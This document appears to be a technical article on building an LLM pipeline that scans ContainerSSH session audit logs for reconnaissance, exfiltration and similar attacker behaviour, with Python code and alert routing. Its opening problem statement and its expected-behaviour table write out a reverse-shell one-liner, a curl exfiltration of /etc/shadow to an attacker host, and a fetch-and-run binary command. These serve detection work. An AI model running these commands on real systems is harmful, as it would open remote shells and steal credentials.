AI-Powered SSH Session Anomaly Detection: Analysing ContainerSSH Audit Logs with LLMs
The Problem
Your SIEM fires on nc -e /bin/bash 10.0.0.1 4444. Except the attacker isn’t running that exact command. They’re running python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444))'. Or they’re running ncat. Or they’re using socat. Or they’ve dropped a statically-linked binary called worker that opens a reverse shell and they’re invoking it by a name that matches no known-bad hash.
The rule fires on the known signature. The attacker uses the unknown variant. This is the fundamental limitation of signature-based detection for interactive SSH sessions: every new variant needs a new rule, so coverage always lags behind attacker creativity.
The gap is not data. ContainerSSH’s audit logging captures everything: every command typed, every line of output returned, every file opened within the container, the exact bytes sent and received over the SSH channel. If a security analyst sat down and read a twenty-minute session recording in full, they would recognise reconnaissance behaviour even if every command was benign on its own. cat /etc/passwd is legitimate. uname -a is legitimate. ps aux is legitimate. netstat -an is legitimate. find / -perm -4000 -type f 2>/dev/null is legitimate in isolation. Run all five in the first ninety seconds of a session by a user who has never logged in before, from a source IP that has never appeared in your fleet, and a competent analyst calls it immediately: that’s reconnaissance.
The analyst would recognise it. A SIEM rule based on any individual command would not. The context — the sequence, the timing, the combination — carries the signal. Large language models process exactly this kind of structured-text context well. They have been trained on security incident reports, CTF write-ups, penetration testing guides, and threat intelligence feeds. They recognise attack patterns holistically, not through exact-match signatures. The goal of this article is to build a pipeline that routes ContainerSSH session recordings through an LLM and produces structured, actionable findings — not to replace analyst judgment, but to flag sessions that warrant it, at machine speed.
Target systems: ContainerSSH with audit logging enabled, any LLM API (Anthropic Claude or OpenAI GPT-4), PagerDuty, Slack, and optionally JIRA or GitHub Issues for incident tracking.
Threat Model
Reconnaissance via individually innocuous commands. An attacker who gains SSH access to a container runs a series of standard system administration commands: id, whoami, uname -a, cat /etc/os-release, cat /etc/passwd, env, ls -la /, find / -name "*.conf" 2>/dev/null, netstat -an, ps aux. No single command is unusual. A junior analyst reviewing a SIEM alert for any one of them would close it as a false positive. But the sequence, run in the first two minutes of a session by an account with no login history, is a textbook initial-access reconnaissance pattern. An LLM evaluating the full session transcript can recognise the sequence and its timing. Login history is not part of the transcript built below (its header carries only the user, source IP, session ID, start time, and duration), so that context has to come from the analyst or from extra metadata added to the prompt.
Slow data exfiltration via small repeated transfers. Threshold-based detection catches large curl calls moving gigabytes of data. It misses an attacker who runs twenty curl calls over fifteen minutes, each moving a few kilobytes of configuration data to an external IP, each individually below every alert threshold. The cumulative pattern — repeated outbound connections to the same external endpoint, with Base64-encoded payloads — is visible in the session transcript. The LLM evaluates the full session, not individual events against thresholds.
Novel binary execution. The attacker transfers a statically-linked binary named svchost or kworker or worker using curl or wget, marks it executable with chmod +x, executes it, and cleans up the binary with rm. No hash matches any known-malicious binary. No process name matches any blocklist. But the behaviour sequence — download, chmod, execute, delete — is a well-documented attacker pattern and is immediately legible in the session transcript to any model that has been trained on security content.
Configuration and Implementation
ContainerSSH Audit Log Format
ContainerSSH’s audit log is written as a sequence of CBOR-encoded messages (or optionally JSON-lines, depending on audit log backend configuration). Each message records a timestamped event in the SSH session: channel open, exec request, PTY allocation, data sent by the client, data sent by the server, channel close. The full message structure is defined in the ContainerSSH audit log specification.
For this pipeline, the relevant fields are:
- type: message type (connect, disconnect, auth, channel, io for stdin/stdout/stderr data, exec)
- timestamp: nanosecond-precision Unix timestamp
- channel_id: which SSH channel the event belongs to
- content: for io events, the raw bytes sent or received; for exec events, the command string
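To make the field list concrete, here is a minimal sketch of parsing one decoded event. The sample record is hypothetical: its field names follow the list above, but the exact JSON your decoder version emits may differ, and `AuditEvent` and `parse_event_line` are illustrative names rather than part of ContainerSSH.

```python
import json
from dataclasses import dataclass


@dataclass(frozen=True)
class AuditEvent:
    """One decoded audit event (assumed shape, fields as listed above)."""
    type: str
    timestamp: int   # nanoseconds since the Unix epoch
    channel_id: str
    content: str


def parse_event_line(line: str) -> AuditEvent:
    """Parse a single JSON-lines record, tolerating missing optional fields."""
    raw = json.loads(line)
    return AuditEvent(
        type=raw["type"],
        timestamp=int(raw["timestamp"]),
        channel_id=str(raw.get("channel_id", "")),
        content=str(raw.get("content", "")),
    )


# Hypothetical sample record, not copied from real ContainerSSH output.
sample = (
    '{"type": "exec", "timestamp": 1700000000123456789, '
    '"channel_id": 0, "content": "uname -a"}'
)
event = parse_event_line(sample)
# Integer division converts nanoseconds to whole seconds without float rounding.
print(event.type, event.content, event.timestamp // 1_000_000_000)
```

Keeping the timestamp as an integer avoids losing precision when events within the same millisecond need to be ordered.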
The pipeline consumes decoded JSON-lines events. ContainerSSH itself writes the binary audit format, which is decoded before ingestion. Enable audit logging in ContainerSSH’s config.yaml:
audit:
  enable: true
  format: binary
  storage:
    s3:
      local: false
      region: eu-west-1
      bucket: your-audit-log-bucket
      prefix: containerssh/audit/
      accessKey: "" # use IAM role
      secretKey: ""
      cacert: ""
      endpoint: ""
      pathStyleAccess: false
      uploadPartSize: 5242880
      parallelUploads: 4
For local development and testing, use the file backend and binary format. ContainerSSH ships with containerssh-auditlog-decoder to convert the binary audit format to JSON. The pipeline below calls this decoder as a subprocess, or you can pre-decode files before ingestion.
Session Log Ingestion and Pre-Processing
#!/usr/bin/env python3
"""
containerssh_session_analyser.py

Reads a ContainerSSH audit log (decoded JSON-lines format),
builds a structured session transcript, calls an LLM for
anomaly analysis, and routes alerts to PagerDuty / Slack.

Requirements:
    pip install anthropic httpx
"""
import json
import re
import subprocess
import sys
from dataclasses import dataclass, field
from datetime import datetime, timezone
from pathlib import Path
from typing import Any

import httpx
from anthropic import Anthropic

# ---------------------------------------------------------------------------
# Secret patterns to redact before sending any data to an external LLM API.
# These are applied to both command lines and command outputs.
# ---------------------------------------------------------------------------
REDACT_PATTERNS = [
    re.compile(r'(?i)(password|passwd|pass)\s*[=:]\s*\S+'),
    re.compile(r'(?i)(token|api_key|apikey|secret|auth)\s*[=:]\s*\S+'),
    re.compile(r'(?i)(aws_access_key_id|aws_secret_access_key)\s*[=:]\s*\S+'),
    re.compile(r'-----BEGIN [A-Z ]+-----[\s\S]+?-----END [A-Z ]+-----'),
    re.compile(r'[A-Za-z0-9+/]{40,}={0,2}'),  # long base64 blobs (likely key material)
]

MAX_OUTPUT_CHARS = 500          # truncate per-command output beyond this length
MAX_TRANSCRIPT_CHARS = 12_000   # hard cap on total transcript before LLM call

@dataclass
class SessionEvent:
    timestamp_ns: int
    event_type: str
    data: str


@dataclass
class SessionMetadata:
    session_id: str
    username: str
    source_ip: str
    source_port: int
    start_time: datetime
    end_time: datetime | None
    duration_seconds: float
    audit_log_path: str
    s3_replay_url: str = ""


@dataclass
class ParsedSession:
    metadata: SessionMetadata
    events: list[SessionEvent] = field(default_factory=list)
    transcript: str = ""

def decode_audit_log(audit_log_path: Path) -> list[dict]:
    """
    Decode a ContainerSSH binary audit log to JSON-lines using the
    containerssh-auditlog-decoder tool, then parse each line.

    Falls back to treating the file as already-decoded JSON-lines if
    the decoder is not installed. Raises subprocess.CalledProcessError
    if the decoder runs but exits with an error.
    """
    try:
        result = subprocess.run(
            ["containerssh-auditlog-decoder", str(audit_log_path)],
            capture_output=True,
            text=True,
            timeout=30,
            check=True,  # surface decoder failures instead of parsing empty output
        )
        lines = result.stdout.splitlines()
    except FileNotFoundError:
        # Decoder not installed: assume the file is already JSON-lines
        lines = audit_log_path.read_text().splitlines()

    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            # Skip malformed lines rather than failing the whole session
            continue
    return events

def redact_sensitive_data(text: str) -> str:
    """Apply all redaction patterns to a string before LLM submission."""
    for pattern in REDACT_PATTERNS:
        text = pattern.sub("[REDACTED]", text)
    return text


def strip_ansi_escapes(text: str) -> str:
    """Remove ANSI terminal escape codes from command output."""
    ansi_escape = re.compile(
        r'(?:\x1B[@-Z\\-_]|[\x80-\x9A\x9C-\x9F]|(?:\x1B\[|\x9B)[0-?]*[ -/]*[@-~])'
    )
    return ansi_escape.sub("", text)

def parse_audit_log(
    audit_log_path: Path,
    session_id: str,
    username: str,
    source_ip: str,
    source_port: int,
    s3_replay_url: str = "",
) -> ParsedSession:
    """
    Parse a decoded ContainerSSH audit log into a structured session
    with a human-readable transcript suitable for LLM analysis.
    """
    raw_events = decode_audit_log(audit_log_path)
    if not raw_events:
        raise ValueError(f"No events decoded from {audit_log_path}")

    # Extract timestamps for session duration
    timestamps = [e["timestamp"] for e in raw_events if "timestamp" in e]
    start_ns = min(timestamps) if timestamps else 0
    end_ns = max(timestamps) if timestamps else 0
    start_dt = datetime.fromtimestamp(start_ns / 1e9, tz=timezone.utc)
    end_dt = datetime.fromtimestamp(end_ns / 1e9, tz=timezone.utc)
    duration = (end_ns - start_ns) / 1e9

    metadata = SessionMetadata(
        session_id=session_id,
        username=username,
        source_ip=source_ip,
        source_port=source_port,
        start_time=start_dt,
        end_time=end_dt,
        duration_seconds=duration,
        audit_log_path=str(audit_log_path),
        s3_replay_url=s3_replay_url,
    )

    transcript_lines: list[str] = [
        "=== SSH Session Transcript ===",
        f"User: {username}",
        f"Source IP: {source_ip}:{source_port}",
        f"Session ID: {session_id}",
        f"Start: {start_dt.isoformat()}",
        f"Duration: {duration:.1f}s",
        "",
    ]

    def render_entry(command: str, started_at: float, chunks: list[str]) -> list[str]:
        """Render one command and its cleaned, redacted, truncated output."""
        output = strip_ansi_escapes("".join(chunks)).strip()
        output = redact_sensitive_data(output)
        if len(output) > MAX_OUTPUT_CHARS:
            omitted = len(output) - MAX_OUTPUT_CHARS
            output = output[:MAX_OUTPUT_CHARS] + f"\n[...truncated, {omitted} chars omitted]"
        entry = [f"[+{started_at:.1f}s] $ {command}"]
        if output:
            entry.append(output)
        return entry

    # Walk events from all channels in timestamp order, pairing each exec
    # event (command string) with the server-to-client io data that follows it.
    all_events = sorted(raw_events, key=lambda e: e.get("timestamp", 0))
    current_command: str | None = None
    current_started_at = 0.0  # offset of the current command, not of the next one
    output_buffer: list[str] = []

    for event in all_events:
        event_type = event.get("type", "")
        ts_rel = (event.get("timestamp", start_ns) - start_ns) / 1e9  # seconds from session start

        if event_type == "exec":
            # Flush previous command + output, stamped with its own start offset
            if current_command is not None:
                transcript_lines.extend(
                    render_entry(current_command, current_started_at, output_buffer)
                )
            output_buffer = []
            # The command is read from "command", falling back to "content"
            # (the field named in the list above); adjust to your decoder's output.
            cmd = str(event.get("command") or event.get("content") or "").strip()
            current_command = redact_sensitive_data(cmd)
            current_started_at = ts_rel
        elif event_type == "io":
            direction = event.get("direction", "")
            content = event.get("content", "")
            # Only capture stdout/stderr (direction == "send" is server→client)
            if direction in ("send", "server_to_client", "stdout", "stderr"):
                if isinstance(content, bytes):
                    content = content.decode("utf-8", errors="replace")
                output_buffer.append(content)

    # Flush final command
    if current_command is not None:
        transcript_lines.extend(
            render_entry(current_command, current_started_at, output_buffer)
        )

    transcript_lines.append("\n=== End of Session ===")
    full_transcript = "\n".join(transcript_lines)

    # Hard cap on total transcript length
    if len(full_transcript) > MAX_TRANSCRIPT_CHARS:
        full_transcript = (
            full_transcript[:MAX_TRANSCRIPT_CHARS]
            + "\n[...transcript truncated at hard limit]"
        )

    return ParsedSession(metadata=metadata, transcript=full_transcript)
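
Before trusting the redaction step with production transcripts, it helps to exercise it in isolation. The sketch below copies two of the patterns from REDACT_PATTERNS so that it runs on its own; `DEMO_PATTERNS` and `redact` are illustrative names, and the sample commands are made up. It shows one input that is caught and one that is not.

```python
import re

# Two patterns copied from REDACT_PATTERNS so this demo is self-contained.
DEMO_PATTERNS = [
    re.compile(r'(?i)(password|passwd|pass)\s*[=:]\s*\S+'),
    re.compile(r'(?i)(token|api_key|apikey|secret|auth)\s*[=:]\s*\S+'),
]


def redact(text: str) -> str:
    """Apply each demo pattern in turn, as redact_sensitive_data does."""
    for pattern in DEMO_PATTERNS:
        text = pattern.sub("[REDACTED]", text)
    return text


# Key/value assignment: matched from the keyword through the value.
covered = redact("export DB_PASSWORD=hunter2")

# Password passed as a CLI flag: no keyword and no '=' or ':', so nothing matches.
missed = redact("mysql -u root -phunter2")

print(covered)  # export DB_[REDACTED]
print(missed)   # mysql -u root -phunter2
```

The second case is the kind of gap to look for when auditing the patterns against the credential formats actually used in your environment.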
LLM Prompt Design and Structured Output
The prompt instructs the model to act as a security analyst and produce a structured JSON assessment. The system prompt is kept stable across sessions; only the transcript changes in the user turn.
SYSTEM_PROMPT = """You are a security analyst specialising in SSH session forensics and attacker behaviour analysis. You will be given a transcript of an SSH session from a containerised bastion host. Your task is to analyse the session and identify attacker behaviour patterns.
Evaluate the session for the following threat categories:
1. RECONNAISSANCE — systematic information gathering: host enumeration (uname, id, whoami, hostname), network mapping (netstat, ss, ip route, arp), user/group enumeration (/etc/passwd, /etc/shadow, getent), process listing (ps, pstree), SUID/SGID binary search (find with -perm), environment variable dumping (env, printenv), unusual file system traversal.
2. EXFILTRATION — data leaving the host: outbound curl/wget/nc to external IPs, base64 encoding of file contents before transfer, repeated small transfers to the same endpoint, reading sensitive files (/etc/shadow, ~/.ssh/*, config files containing credentials), DNS-based exfiltration patterns.
3. PRIVILEGE ESCALATION — attempts to gain elevated access: sudo invocations (especially sudo -l, sudo su, sudo bash), exploitation of SUID binaries, manipulation of /etc/sudoers or /etc/passwd, kernel exploit tool execution, capability manipulation (capsh, setcap).
4. PERSISTENCE — mechanisms to maintain access after session end: SSH key addition to ~/.ssh/authorized_keys, crontab modification (crontab -e, writing to /etc/cron.*), systemd unit file creation (/etc/systemd/system/), web shell deployment, modification of shell startup files (.bashrc, .profile).
5. LATERAL MOVEMENT — tools and patterns for moving to other hosts: SSH key discovery and use (ssh-keygen, ssh to internal IPs), internal network scanning (nmap against RFC1918 ranges), credential harvesting from memory or files, use of cloud provider metadata endpoints (169.254.169.254).
Consider the full session holistically. Individual commands may be legitimate; sequences and combinations reveal intent. A session that opens with six information-gathering commands from an account with no login history is suspicious even if each command is benign in isolation.
Respond with a JSON object matching this exact schema:
{
  "risk_level": "critical|high|medium|low|benign",
  "confidence": "high|medium|low",
  "summary": "One or two sentence plain-English summary of what happened in this session.",
  "findings": [
    {
      "category": "reconnaissance|exfiltration|privilege_escalation|persistence|lateral_movement",
      "severity": "critical|high|medium|low",
      "command": "The specific command or command sequence that triggered this finding",
      "rationale": "Why this command or sequence is suspicious in context",
      "timestamp_relative": "Approximate time offset from session start (e.g. +12s)"
    }
  ],
  "recommended_action": "none|monitor|alert_soc|page_oncall|isolate_container",
  "false_positive_indicators": "Brief note on what would make this a false positive, or empty string if none."
}
If the session appears to be normal administrative activity, set risk_level to benign or low, findings to an empty list, and recommended_action to none.
Return only the JSON object. Do not add prose before or after it."""

def analyse_session_with_llm(session: ParsedSession) -> dict[str, Any]:
    """
    Submit the session transcript to the LLM and return the parsed
    structured JSON finding. Raises on API error or schema violation.
    """
    client = Anthropic()
    user_message = f"""Please analyse this SSH session transcript for attacker behaviour patterns.

{session.transcript}"""

    response = client.messages.create(
        model="claude-sonnet-4-5",
        max_tokens=2048,
        system=SYSTEM_PROMPT,
        messages=[{"role": "user", "content": user_message}],
    )
    raw_output = response.content[0].text.strip()

    # Strip markdown code fences if the model wrapped the JSON
    if raw_output.startswith("```"):
        raw_output = re.sub(r'^```[a-z]*\n?', '', raw_output)
        raw_output = re.sub(r'\n?```$', '', raw_output)

    try:
        finding = json.loads(raw_output)
    except json.JSONDecodeError as exc:
        raise ValueError(
            f"LLM returned non-JSON output. Raw response:\n{raw_output}"
        ) from exc

    # Validate required fields
    required_fields = {"risk_level", "confidence", "summary", "findings", "recommended_action"}
    missing = required_fields - set(finding.keys())
    if missing:
        raise ValueError(f"LLM output missing required fields: {missing}")

    valid_risk_levels = {"critical", "high", "medium", "low", "benign"}
    if finding["risk_level"] not in valid_risk_levels:
        raise ValueError(f"Invalid risk_level: {finding['risk_level']!r}")

    return finding
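
The validation above only checks for required keys and one enum. A stricter variant with a bounded correction retry might look like the sketch below. It uses only the standard library, so it is an alternative to a pydantic model and not a replacement for one. The `ask` callable is a hypothetical stand-in for whatever function sends a prompt to your LLM and returns raw text, and `schema_errors` and `analyse_with_retry` are illustrative names.

```python
import json
from typing import Any, Callable

# Allowed enum values, taken from the schema in SYSTEM_PROMPT.
ALLOWED = {
    "risk_level": ("critical", "high", "medium", "low", "benign"),
    "confidence": ("high", "medium", "low"),
    "recommended_action": ("none", "monitor", "alert_soc", "page_oncall", "isolate_container"),
}


def schema_errors(finding: dict[str, Any]) -> list[str]:
    """Return human-readable schema problems; an empty list means valid."""
    errors = [
        f"{key} must be one of {list(allowed)}, got {finding.get(key)!r}"
        for key, allowed in ALLOWED.items()
        if finding.get(key) not in allowed
    ]
    if not isinstance(finding.get("summary"), str):
        errors.append("summary must be a string")
    if not isinstance(finding.get("findings"), list):
        errors.append("findings must be a list")
    return errors


def analyse_with_retry(
    ask: Callable[[str], str], transcript: str, max_retries: int = 2
) -> dict[str, Any]:
    """Call `ask`, re-prompting with the error list until the schema validates."""
    prompt = transcript
    errors: list[str] = []
    for _ in range(max_retries + 1):
        try:
            finding = json.loads(ask(prompt))
            if isinstance(finding, dict):
                errors = schema_errors(finding)
            else:
                errors = ["top level must be a JSON object"]
        except json.JSONDecodeError as exc:
            errors = [f"not valid JSON: {exc.msg}"]
        if not errors:
            return finding
        prompt = (
            f"Your previous response had schema errors: {errors}. "
            f"Please return only the valid JSON.\n\n{transcript}"
        )
    raise ValueError(f"schema still invalid after {max_retries} retries: {errors}")


# Stubbed model: the first reply is invalid, the second is valid.
replies = iter([
    '{"risk_level": "severe"}',
    '{"risk_level": "low", "confidence": "high", "summary": "Routine admin.", '
    '"findings": [], "recommended_action": "none"}',
])
result = analyse_with_retry(lambda prompt: next(replies), "=== SSH Session Transcript ===")
print(result["risk_level"])
```

Passing the model call in as a function keeps the retry logic testable without network access.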
Alerting Integration
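import os

# Read credentials from the environment rather than hard-coding them in source.
# The variable names are this script's own convention; rename to suit your deployment.
PAGERDUTY_ROUTING_KEY = os.environ.get("PAGERDUTY_ROUTING_KEY", "")
SLACK_WEBHOOK_URL = os.environ.get("SLACK_WEBHOOK_URL", "")
GITHUB_TOKEN = os.environ.get("GITHUB_TOKEN", "")
GITHUB_REPO = os.environ.get("GITHUB_REPO", "your-org/security-incidents")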

def send_pagerduty_alert(session: ParsedSession, finding: dict) -> str:
    """
    Fire a PagerDuty incident for CRITICAL findings.
    Returns the PagerDuty dedup_key for the created incident.
    """
    dedup_key = f"containerssh-{session.metadata.session_id}"
    payload = {
        "routing_key": PAGERDUTY_ROUTING_KEY,
        "event_action": "trigger",
        "dedup_key": dedup_key,
        "payload": {
            "summary": (
                f"[CRITICAL] Attacker behaviour in SSH session: "
                f"{session.metadata.username}@{session.metadata.source_ip} - "
                f"{finding['summary']}"
            ),
            "severity": "critical",
            "source": f"containerssh/{session.metadata.session_id}",
            "custom_details": {
                "session_id": session.metadata.session_id,
                "username": session.metadata.username,
                "source_ip": session.metadata.source_ip,
                "duration_seconds": session.metadata.duration_seconds,
                "llm_risk_level": finding["risk_level"],
                "llm_confidence": finding["confidence"],
                "findings_count": len(finding["findings"]),
                "recommended_action": finding["recommended_action"],
                "session_replay_url": session.metadata.s3_replay_url,
            },
        },
    }
    with httpx.Client() as client:
        resp = client.post(
            "https://events.pagerduty.com/v2/enqueue",
            json=payload,
            timeout=10,
        )
        resp.raise_for_status()
    return dedup_key

def send_slack_alert(session: ParsedSession, finding: dict) -> None:
    """Send a Slack notification for HIGH and CRITICAL findings."""
    colour = {"critical": "#FF0000", "high": "#FF6600", "medium": "#FFCC00"}.get(
        finding["risk_level"], "#CCCCCC"
    )
    findings_text = "\n".join(
        f"• *{f['category'].upper()}* ({f['severity']}): `{f['command']}` - {f['rationale']}"
        for f in finding["findings"][:5]  # cap at 5 findings in Slack message
    )
    message_blocks: list[dict[str, Any]] = [
        {
            "type": "section",
            "text": {
                "type": "mrkdwn",
                "text": (
                    f":warning: *SSH Anomaly Detected*\n"
                    f"*Risk:* {finding['risk_level'].upper()} "
                    f"(confidence: {finding['confidence']})\n"
                    f"*User:* `{session.metadata.username}` "
                    f"from `{session.metadata.source_ip}`\n"
                    f"*Session ID:* `{session.metadata.session_id}`\n"
                    f"*Duration:* {session.metadata.duration_seconds:.0f}s\n"
                    f"*Summary:* {finding['summary']}"
                ),
            },
        },
        {
            "type": "section",
            "text": {"type": "mrkdwn", "text": f"*Findings:*\n{findings_text}"},
        },
    ]
    # A placeholder such as "#" is not a valid button URL, so only add the
    # replay button when a real URL is available.
    if session.metadata.s3_replay_url:
        message_blocks.append(
            {
                "type": "actions",
                "elements": [
                    {
                        "type": "button",
                        "text": {"type": "plain_text", "text": "View Session Replay"},
                        "url": session.metadata.s3_replay_url,
                    }
                ],
            }
        )
    payload = {"attachments": [{"color": colour, "blocks": message_blocks}]}
    with httpx.Client() as client:
        resp = client.post(SLACK_WEBHOOK_URL, json=payload, timeout=10)
        resp.raise_for_status()

def create_github_incident(session: ParsedSession, finding: dict) -> str:
    """
    Create a GitHub Issue for the incident with structured body and
    a link to the session replay URL. Returns the issue URL.
    """
    def cell(value: Any) -> str:
        # Escape pipes and newlines so commands such as `a | b` cannot break the table
        return str(value).replace("|", "\\|").replace("\n", " ")

    findings_md = "\n".join(
        f"| `{cell(f['command'])}` | {cell(f['category'])} "
        f"| {cell(f['severity'])} | {cell(f['rationale'])} |"
        for f in finding["findings"]
    )
    # Emit a link only when a replay URL exists; otherwise plain text
    replay_url = session.metadata.s3_replay_url
    replay_md = (
        f"[View full session recording]({replay_url})"
        if replay_url
        else "_S3 URL not available_"
    )
    body = f"""## SSH Session Anomaly: {finding["risk_level"].upper()}

**Session ID:** `{session.metadata.session_id}`
**User:** `{session.metadata.username}`
**Source IP:** `{session.metadata.source_ip}:{session.metadata.source_port}`
**Session start:** {session.metadata.start_time.isoformat()}
**Duration:** {session.metadata.duration_seconds:.0f}s
**LLM confidence:** {finding["confidence"]}

### Summary
{finding["summary"]}

### Findings

| Command | Category | Severity | Rationale |
|---------|----------|----------|-----------|
{findings_md}

### Recommended Action
`{finding["recommended_action"]}`

### False Positive Indicators
{finding.get("false_positive_indicators") or "_None identified._"}

### Session Replay
{replay_md}

---
_Generated by containerssh-session-analyser. Requires analyst review before escalation._
"""
    headers = {
        "Authorization": f"Bearer {GITHUB_TOKEN}",
        "Accept": "application/vnd.github+json",
        "X-GitHub-Api-Version": "2022-11-28",
    }
    payload = {
        "title": (
            f"[SSH Anomaly] {finding['risk_level'].upper()} - "
            f"{session.metadata.username}@{session.metadata.source_ip}"
        ),
        "body": body,
        "labels": ["security", "ssh-anomaly", finding["risk_level"]],
    }
    with httpx.Client() as client:
        resp = client.post(
            f"https://api.github.com/repos/{GITHUB_REPO}/issues",
            headers=headers,
            json=payload,
            timeout=15,
        )
        resp.raise_for_status()
    return resp.json()["html_url"]

def route_alerts(session: ParsedSession, finding: dict) -> None:
    """
    Route the finding to the appropriate alerting channels based on risk level.

    CRITICAL → PagerDuty + Slack + GitHub Issue
    HIGH → Slack + GitHub Issue
    MEDIUM → GitHub Issue only
    LOW/BENIGN → no action
    """
    risk = finding["risk_level"]
    if risk == "critical":
        send_pagerduty_alert(session, finding)
        send_slack_alert(session, finding)
        issue_url = create_github_incident(session, finding)
        print(f"[CRITICAL] Incident created: {issue_url}")
    elif risk == "high":
        send_slack_alert(session, finding)
        issue_url = create_github_incident(session, finding)
        print(f"[HIGH] Slack alert sent. Issue: {issue_url}")
    elif risk == "medium":
        issue_url = create_github_incident(session, finding)
        print(f"[MEDIUM] GitHub issue created: {issue_url}")
    else:
        print(f"[{risk.upper()}] No alerts triggered.")
Main Pipeline
def run_pipeline(
    audit_log_path: str,
    session_id: str,
    username: str,
    source_ip: str,
    source_port: int = 22,
    s3_replay_url: str = "",
) -> dict[str, Any]:
    """
    Full pipeline: ingest → pre-process → LLM analyse → alert.

    Falls back to a stub finding on LLM API failure so that
    downstream rule-based detection still runs.
    """
    path = Path(audit_log_path)
    if not path.exists():
        raise FileNotFoundError(f"Audit log not found: {audit_log_path}")

    print(f"[pipeline] Parsing session {session_id} from {path.name}")
    session = parse_audit_log(
        path, session_id, username, source_ip, source_port, s3_replay_url
    )
    print(f"[pipeline] Transcript length: {len(session.transcript)} chars")

    try:
        print("[pipeline] Submitting to LLM for analysis")
        finding = analyse_session_with_llm(session)
        print(
            f"[pipeline] LLM result: risk_level={finding['risk_level']}, "
            f"findings={len(finding['findings'])}"
        )
    except Exception as exc:
        print(f"[pipeline] LLM analysis failed ({exc}), falling back to rule-based stub")
        # Fallback: emit a low-risk stub so rule-based SIEM still ingests
        finding = {
            "risk_level": "low",
            "confidence": "low",
            "summary": "LLM analysis unavailable. Manual review required.",
            "findings": [],
            "recommended_action": "monitor",
            "false_positive_indicators": "",
            "_llm_error": str(exc),
        }

    route_alerts(session, finding)
    return finding


if __name__ == "__main__":
    import argparse

    parser = argparse.ArgumentParser(description="Analyse a ContainerSSH audit log with an LLM.")
    parser.add_argument("audit_log", help="Path to decoded ContainerSSH audit log (JSON-lines)")
    parser.add_argument("--session-id", required=True)
    parser.add_argument("--username", required=True)
    parser.add_argument("--source-ip", required=True)
    parser.add_argument("--source-port", type=int, default=22)
    parser.add_argument("--s3-replay-url", default="")
    args = parser.parse_args()

    result = run_pipeline(
        args.audit_log,
        args.session_id,
        args.username,
        args.source_ip,
        args.source_port,
        args.s3_replay_url,
    )
    print(json.dumps(result, indent=2))
Triggering the Pipeline from ContainerSSH
ContainerSSH supports a webhook on session disconnect. Configure a lightweight HTTP handler (a simple Flask or FastAPI endpoint) that receives the disconnect event, fetches the completed audit log from S3, and invokes the pipeline:
# ContainerSSH config.yaml: webhook on disconnect
server:
  listen: "0.0.0.0:2222"
  hostkeys:
    - /etc/containerssh/host_ed25519_key
auth:
  webhook:
    url: http://auth-service:8080/auth
backend:
  type: kubernetes
# Webhook fired on session events including disconnect
configserver:
  url: http://config-service:8080/config
audit:
  enable: true
  format: binary
  intercept:
    stdin: true
    stdout: true
    stderr: true
    passwords: false # never record passwords (protocol-level protection)
The disconnect webhook carries sessionId, username, remoteAddr. Your handler constructs the S3 key from the session ID (ContainerSSH writes audit logs under a path derived from the session ID), generates a pre-signed URL for session replay, and calls run_pipeline.
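
The handler’s parsing step can be sketched with the standard library alone. The payload field names (sessionId, username, remoteAddr) come from the description above. Everything else is an assumption: that remoteAddr arrives as host:port, that audit objects live at the prefix plus the session ID, and the names `DisconnectEvent`, `parse_disconnect_event`, and `audit_log_key`. Check the key layout against what your deployment actually writes before relying on it.

```python
import json
from dataclasses import dataclass


@dataclass(frozen=True)
class DisconnectEvent:
    session_id: str
    username: str
    source_ip: str
    source_port: int


def parse_disconnect_event(body: bytes) -> DisconnectEvent:
    """Extract the fields run_pipeline needs from a disconnect webhook body."""
    payload = json.loads(body)
    # Assumption: remoteAddr is "host:port". rpartition splits on the last
    # colon, so a bracketed IPv6 host such as "[::1]:2222" stays intact.
    host, _, port = payload["remoteAddr"].rpartition(":")
    if not host:
        # No colon at all: treat the whole value as the host, port unknown.
        host, port = port, "0"
    return DisconnectEvent(
        session_id=payload["sessionId"],
        username=payload["username"],
        source_ip=host.strip("[]"),
        source_port=int(port),
    )


def audit_log_key(prefix: str, session_id: str) -> str:
    """Hypothetical S3 key layout: <prefix>/<session_id>."""
    return f"{prefix.rstrip('/')}/{session_id}"


# Made-up payload for illustration only.
event = parse_disconnect_event(
    b'{"sessionId": "abc123", "username": "deploy", "remoteAddr": "203.0.113.7:51234"}'
)
key = audit_log_key("containerssh/audit/", event.session_id)
print(event.source_ip, event.source_port, key)
```

Keeping this step free of web-framework and S3 dependencies makes it easy to unit-test; the Flask or FastAPI endpoint then only has to pass the request body in and hand the result to run_pipeline.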
Expected Behaviour
| Session Pattern | LLM Risk Level | Action Triggered |
|---|---|---|
| Normal admin: ls, git pull, systemctl status app, exit | benign | None |
| Reconnaissance sequence: id, uname -a, cat /etc/passwd, find / -perm -4000, netstat -an within first 2 minutes, no prior login history | high | Slack alert + GitHub issue |
| Exfiltration attempt: cat /etc/shadow \| base64 \| curl -d @- https://attacker.example.com/collect | critical | PagerDuty page + Slack + GitHub issue |
| Novel binary execution: curl http://185.x.x.x/worker -o /tmp/worker && chmod +x /tmp/worker && /tmp/worker & | critical | PagerDuty page + Slack + GitHub issue |
| Slow exfiltration: 20 curl calls over 15 minutes to same external IP, each moving a small config fragment | high | Slack alert + GitHub issue |
| Sysadmin checking SUID binaries as part of documented hardening task (matches change ticket context) | medium or high | GitHub issue only; analyst verifies change ticket, closes as false positive |
| Automated deployment script running as service account: kubectl apply, helm upgrade | low or benign | None |
The “sysadmin false positive” row is important. An experienced sysadmin auditing SUID binaries runs commands identical to a reconnaissance sequence. The LLM will often flag this as medium or high because the commands match the threat pattern. The false_positive_indicators field in the structured output should contain a note like “This activity is consistent with a security audit — verify against change management records.” The analyst reviews this, matches against an open change ticket, and closes the GitHub issue without escalation. This is the intended workflow: the LLM flags for human review, the human provides the context the LLM cannot access.
Trade-offs
| Dimension | Detail | Implication |
|---|---|---|
| Latency: post-session analysis | The LLM analyses the session after the SSH disconnect event. Analysis completes in 3–15 seconds depending on session length and LLM API latency. The attacker has already exited. | This pipeline detects and records; it does not block. Real-time blocking requires a different architecture (streaming analysis, which multiplies cost). For most threat models, post-session detection with fast alerting is sufficient — the session happened in a container that is discarded at disconnect. |
